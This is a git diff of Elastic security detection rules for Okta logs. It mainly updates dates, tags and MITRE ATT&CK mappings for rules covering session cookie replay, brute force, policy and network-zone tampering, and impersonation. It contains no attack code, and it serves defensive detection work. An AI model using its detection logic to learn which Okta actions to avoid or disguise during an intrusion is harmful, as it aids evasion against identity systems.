["okta"] maturity = "production" -updated_date = "2025/10/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,14 +55,7 @@ same dt_hash. This will help identify the nature of the anomaly. risk_score = 73 rule_id = "fb3ca230-af4e-11f0-900d-f661ea17fbcc" severity = "high" -tags = [ - "Domain: Identity", - "Data Source: Okta", - "Data Source: Okta System Logs", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" -] +tags = ["Domain: Identity", "Tactic: Defense Evasion", "Data Source: Okta", "Data Source: Okta System Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "threshold" @@ -79,17 +72,21 @@ data_stream.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1539" -name = "Steal Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1539/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml index 463bd891fd3..48def95c88b 100644 --- a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml +++ b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/26" integration = ["okta"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,15 +81,7 @@ references = [ risk_score = 73 rule_id = "9ed5d08f-aad6-4c03-838c-d686da887c2c" severity = "high" -tags = [ - "Domain: Identity", - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Data Source: Okta System Logs", - "Tactic: Credential Access", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Lateral Movement", "Data Source: Okta", "Data Source: Okta System Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -159,22 +151,30 @@ FROM logs-okta.system-* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1539" -name = "Steal Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1539/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.004" name = "Web Session Cookie" @@ -184,4 +184,3 @@ reference = "https://attack.mitre.org/techniques/T1550/004/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml index a27b743a262..82d4bcc65fb 100644 --- a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml +++ b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["okta"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,29 +113,23 @@ from logs-okta* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" [[rule.threat.technique.subtechnique]] id = "T1110.004" name = "Credential Stuffing" reference = "https://attack.mitre.org/techniques/T1110/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml index 72b54d82017..2f24bf1da20 100644 --- a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml +++ b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["okta"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,14 +122,18 @@ FROM logs-okta.system-* METADATA _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/okta/credential_access_user_impersonation_access.toml b/rules/integrations/okta/credential_access_user_impersonation_access.toml index eef4992bb6a..9b00e895d4f 100644 --- a/rules/integrations/okta/credential_access_user_impersonation_access.toml +++ b/rules/integrations/okta/credential_access_user_impersonation_access.toml @@ -2,7 +2,7 @@ creation_date = "2022/03/22" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,12 +58,7 @@ references = [ risk_score = 73 rule_id = "cdbebdc1-dc97-43c6-a538-f26a20c0a911" severity = "high" -tags = [ - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Data Source: Okta", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -75,8 +70,17 @@ event.dataset:okta.system and event.action:user.session.impersonation.initiate [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml index 5291da1293e..78efb62e5d5 100644 --- a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml +++ b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,19 +81,13 @@ event.dataset:okta.system and event.action:zone.deactivate [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml index 7f1bcaf2c10..038fb4e5f17 100644 --- a/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml +++ b/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,19 +81,13 @@ event.dataset:okta.system and event.action:zone.delete [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml index c2ae0981e52..4c597f990c3 100644 --- a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml +++ b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,14 +62,7 @@ references = [ risk_score = 47 rule_id = "6649e656-6f85-11ef-8876-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: SaaS", - "Data Source: Okta", - "Use Case: Threat Detection", - "Use Case: Identity and Access Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -88,22 +81,39 @@ event.dataset: okta.system [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.display_name"] diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml index afb56b6df29..8494737858f 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,19 +88,13 @@ event.dataset:okta.system and event.action:policy.lifecycle.deactivate [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml index 497da81d4d9..f67bcff4ab9 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,19 +87,13 @@ event.dataset:okta.system and event.action:policy.rule.deactivate [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml index d15fdf5794f..823db9f42f6 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/28" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,19 +88,23 @@ event.dataset:okta.system and event.action:policy.lifecycle.delete [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml index 5b253b86daa..7bafae062cb 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,19 +87,13 @@ event.dataset:okta.system and event.action:policy.rule.delete [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml index 2be46aca15c..ab57bdc871e 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,19 +76,13 @@ event.dataset:okta.system and event.action:policy.lifecycle.update [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml index b163bbcf480..d06439bd616 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,19 +85,13 @@ event.dataset:okta.system and event.action:policy.rule.update [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml index 8c9739a98ea..a3dc9b07157 100644 --- a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml +++ b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic", "@BenB196", "Austin Songer"] @@ -62,12 +62,7 @@ references = [ risk_score = 47 rule_id = "e90ee3af-45fc-432e-a850-4a58cf14a457" severity = "medium" -tags = [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Initial Access", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "threshold" @@ -82,41 +77,21 @@ event.dataset:okta.system and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.threshold] field = ["okta.actor.alternate_id"] value = 5 diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml index 121e67e54ef..0500cf14163 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,12 +62,7 @@ references = [ risk_score = 21 rule_id = "edb91186-1c7e-4db8-b53e-bfa33a1a0a8a" severity = "low" -tags = [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Impact", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -78,14 +73,18 @@ event.dataset:okta.system and event.action:application.lifecycle.deactivate [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1489" -name = "Service Stop" -reference = "https://attack.mitre.org/techniques/T1489/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml index 79b6707bfb6..c5ef4a765ea 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -69,12 +69,7 @@ references = [ risk_score = 21 rule_id = "c74fd275-ab2c-4d49-8890-e2943fa65c09" severity = "low" -tags = [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Impact", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -86,8 +81,17 @@ event.dataset:okta.system and event.action:application.lifecycle.update [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/impact_possible_okta_dos_attack.toml b/rules/integrations/okta/impact_possible_okta_dos_attack.toml index 52c88d548de..fe263825367 100644 --- a/rules/integrations/okta/impact_possible_okta_dos_attack.toml +++ b/rules/integrations/okta/impact_possible_okta_dos_attack.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,19 +78,18 @@ event.dataset:okta.system and event.action:(application.integration.rate_limit_e [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1498" -name = "Network Denial of Service" -reference = "https://attack.mitre.org/techniques/T1498/" [[rule.threat.technique]] id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" +[[rule.threat.technique.subtechnique]] +id = "T1499.003" +name = "Application Exhaustion Flood" +reference = "https://attack.mitre.org/techniques/T1499/003/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml index 10d46662b9a..431094faa47 100644 --- a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml +++ b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,17 +75,21 @@ event.dataset:okta.system and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.id", "cloud.account.id"] diff --git a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml index d157ea4686f..35aec3b7673 100644 --- a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml +++ b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/14" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -76,35 +76,18 @@ event.dataset:okta.system and event.action:app.generic.unauth_app_access_attempt [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml index 3980b66a6b4..dfa658d7dcd 100644 --- a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml +++ b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/01/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,13 +68,7 @@ references = [ risk_score = 47 rule_id = "1ceb05c4-7d25-11ee-9562-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Identity", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Data Source: Okta", - "Resources: Investigation Guide", -] +tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -111,14 +105,36 @@ value = "now-5d" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1199" -name = "Trusted Relationship" -reference = "https://attack.mitre.org/techniques/T1199/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git 